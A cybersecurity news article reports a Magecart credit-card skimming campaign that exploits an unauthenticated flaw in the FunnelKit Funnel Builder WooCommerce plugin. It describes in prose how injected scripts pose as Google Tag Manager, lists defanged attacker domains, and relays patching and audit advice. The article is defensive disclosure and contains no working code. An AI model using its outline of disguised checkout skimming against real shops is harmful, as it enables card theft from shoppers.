Magecart Attack: Critical Flaw in FunnelKit Plugin Sparks Credit Card Skimming on 40,000+ WooCommerce Sites
Proprietors of WordPress e-commerce platforms have fallen under siege due to a critical vulnerability discovered in the Funnel Builder plugin by FunnelKit. The flaw compromises over 40,000 WooCommerce storefronts, and threat actors have already begun exploiting this systemic breach to exfiltrate consumers’ banking credentials.
Forensic analysts from Sansec reported that the flaw permits any unauthenticated remote actor to inject malicious JavaScript payloads directly into checkout interfaces. The adversaries meticulously cloak these illicit scripts as routine Google Tag Manager analytics tools, causing website administrators to frequently overlook the subversion amidst legitimate marketing telemetry.
Once a storefront is compromised, the rogue script initializes upon every payment layout, surreptitiously intercepting credit card numbers, CVV codes, billing addresses, and corollary personally identifiable information (PII) belonging to patrons.
The defect impacts all iterations of Funnel Builder antecedent to version 3.15.0.3. The vulnerability resides within the public checkout interface architecture, which erroneously permitted the execution of internal plugin methodologies absent explicit privilege verification. Leveraging this structural deficit, interlopers could directly manipulate global FunnelKit configurations and append arbitrary scripts into the External Scripts repository.
The developers of FunnelKit have since deployed a definitive remediation. The updated iteration instantiates rigorous access control validations alongside a strict whitelist of permissible internal methodologies authorized for invocation via the checkout interface.
During the forensic inquiry, specialists isolated a malicious payload masquerading as a Google Tag Manager loader. The script established an outbound connection to fetch an external file from the domain analytics-reports[.]com, subsequently opening a WebSocket channel with a command-and-control node at protect-wss[.]com. Through this tunnel, the compromised storefront ingested a bespoke digital skimmer custom-tailored to the specific architecture of the target website.
This paradigm of counterfeiting Google utility suites has long been a signature tactic of Magecart collectives. Auditors routinely disregard familiar-looking analytical scripts, enabling the malicious architecture to persist undetected for protracted durations.
FunnelKit has urgently counseled its user base to immediately expedite plugin updates via the WordPress administrative dashboard, while concurrently auditing the Settings → Checkout → External Scripts path to expunge any ambiguous or unrecognized code blocks. Sansec further recommends a comprehensive malware and backdoor scan of the underlying server infrastructure, as a portion of the storefront ecosystem may already harbor persistent compromises.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
